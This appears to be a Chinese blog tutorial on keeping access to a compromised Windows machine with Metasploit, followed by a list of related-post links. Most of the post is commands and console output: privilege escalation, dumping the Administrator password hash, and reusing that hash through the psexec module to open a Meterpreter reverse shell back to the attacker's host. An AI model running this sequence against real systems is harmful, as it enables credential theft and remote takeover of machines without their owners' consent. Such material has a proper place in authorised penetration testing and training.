kali linux权限维持,msfconsole权限维持
获取管理员hash
获得shell后,执行命令getsystem
提高权限为管理员权限,接着执行命令run post/windows/gather/hashdump
获取hash
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e:::
权限维持
执行命令use exploit/windows/smb/psexec
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.232.129
set LPORT 443
set RHOST 192.168.232.204
set SMBUser Administrator
show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOST 192.168.232.204 yes The target address
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser Administrator no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.232.129 yes The listen address (an interface may be specified)
LPORT 443 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e
SMBPass => aad3b435b51404eeaad3b435b51404ee:bd75068c6729aacd2fe3497b43bb664e
msf exploit(windows/smb/psexec) > exploit
[*] Started reverse TCP handler on 192.168.232.129:443
[*] 192.168.232.204:445 - Connecting to the server...
[*] 192.168.232.204:445 - Authenticating to 192.168.232.204:445 as user 'Administrator'...
[*] 192.168.232.204:445 - Selecting PowerShell target
[*] 192.168.232.204:445 - Executing the payload...
[+] 192.168.232.204:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 192.168.232.204
[*] Meterpreter session 1 opened (192.168.232.129:443 -> 192.168.232.204:5231) at 2018-07-03 19:26:26 +0800
meterpreter >
成功得到反弹
版权属于:逍遥子大表哥
按照知识共享署名-非商业性使用 4.0 国际协议进行许可,转载引用文章应遵循相同协议。
kali linux权限维持,msfconsole权限维持相关推荐
- 手机免root安装kali linux 步骤,离线版(最终可行版)
手机免root安装kali linux 步骤 下载termux可以通过 F-Droid跳过google play,注意有点老安卓手机不行,比如我的三星i9152,下载f-driod之后显示不兼容,终于 ...
- Kali Linux 秘籍 第七章 权限提升
第七章 权限提升 作者:Willie L. Pritchett, David De Smet 译者:飞龙 协议:CC BY-NC-SA 4.0 简介 我们已经获得了想要攻击的计算机的权限.于是将权限尽 ...
- Kali渗透测试之六提升权限
◆提升权限:获取目标系统的控制权是渗透成功的标志.审计人员也可以使用适用于目标系统的本地漏洞来提升自己的权限,只要他们能够在目标系统上运行提权漏洞利用程序,就可以获得主机上的超级用户权限或者系统级权限 ...
- 【Linux系统】第10节 linux系统文件及目录权限详解
目录 1 权限 1.1 权限的查看 1.2 权限解读 2 权限修改 2.1 修改文件/目录普通权限 2.1.1 方法1:指定权限修改 2.1.2 方法2:八进制赋权法 2.2 修改文件所属信息 2.3 ...
- Linux之获取管理员权限的相关命令
Linux之获取管理员权限的相关命令 1. sudo命令的使用 命令 说明 sudo -s 切换到root用户,获取管理员权限 sudo 某个命令的执行需要获取管理员权限可以在执行命令前面加上sudo ...
- 深入理解Linux中的文件权限
Linux中文件权限 Linux中每个文件都有一个特定的拥有者(一般是创建它的用户)和所属用户组,这是它的固有属性.文件可以利用这两个固有属性来规定它的拥有者或者是所属用户组内的用户是否拥有对它的访问 ...
- Linux系统文件安全与权限
上篇文章详细介绍了通过文件压缩程序和归档程序,从而掌握在linux系统中如何归档和备份数据.那么,今天,这篇文章还是回到linux的基础知识体系中,今天主要围绕linux系统中的权限展开描述. 综所周 ...
- Linux绝对权限和相对权限法,Linux基础学习笔记
8种机械键盘轴体对比 本人程序员,要买一个写代码的键盘,请问红轴和茶轴怎么选? 学习计划里有一些关于Linux的知识,所以今后一段时间用来学习Linux的基础知识和服务器架设知识,平时一直在用,但是一 ...
- Linux sticky bit 目录权限 rwt权限
[linux权限分为 user group others三组] 今天看到有个目录的权限是rwxrwxrwt 很惊讶这个t是什么,怎么不是x或者-呢?搜了下发现: 这个t代表是所谓的sticky bit ...
- 【Linux】文件特殊权限 SUID/SGID/Sticky Bit
linux中除了常见的读(r).写(w).执行(x)权限以外,还有3个特殊的权限,分别是setuid.setgid和stick bit 1.setuid.setgid 先看个实例,查看你的/usr/b ...
最新文章
- [改善Java代码]避开基本类型数组转换列表陷阱
- android富文本图片自适应,Android 图片混排富文本编辑器控件
- 手风琴html例子,jquery实现简单手风琴菜单效果实例
- 关于设计模式——策略模式-Strategy Pattern
- hnu 暑期实训之公交系统
- [转载] Python字典的setdefault()方法
- 方法、hadoop源码之JobQueueTaskScheduler-by小雨
- Boost Asio dispatch()与post()的区别
- Unity 基础纹理
- 如何让那些模糊的照片变得高清?不会PS也能解决
- PHP初中高级学习在线文档下载
- 窄带Vs宽带 MIMO
- (error) MOVED 4848 172.26.158.xxx:xxxx
- 使用PowerCli来创建自定义ESXi ISO镜像
- ESP32-CAM视频传输至公网服务器并转发视频数据流
- 关于yd ui 移动端自适应的方案
- 鼠标键盘与计算机无法连接,蓝牙鼠标/键盘同时提示已配对 但是永远无法连接上...
- 学计算机选择什么编程语言好一些?
- c语言编程解三元一次方程组,三元一次方程组的解是 [] A.B.C.D
- 网能云平台,掌聚网能助力机房运维的利器
热门文章
- 2013年上半年 网络工程师试卷答案及详解
- JavaVM和JNIEnv
- 智能汽车路径规划-曲线插值法、人工势场法
- TP-LINK无线网卡免驱版 安装使用问题整理
- mysql数据库实验报告模板_MySQL数据库技术》实验报告模板.doc
- 用Java语言编写ajax设计模式_《松本行弘的程序世界》读书笔记(上)——面向对象、程序块、设计模式、ajax...
- Excel做的慢?学会这些Excel技巧和26个快捷键,让你效率翻十倍!
- 介绍两种常见软件开发模式:“敏捷”和“瀑布”
- 软件开发模式介绍和对比(瀑布、迭代、敏捷等)
- 怎么删除手机html,两种方法教你如何删除手机模拟大师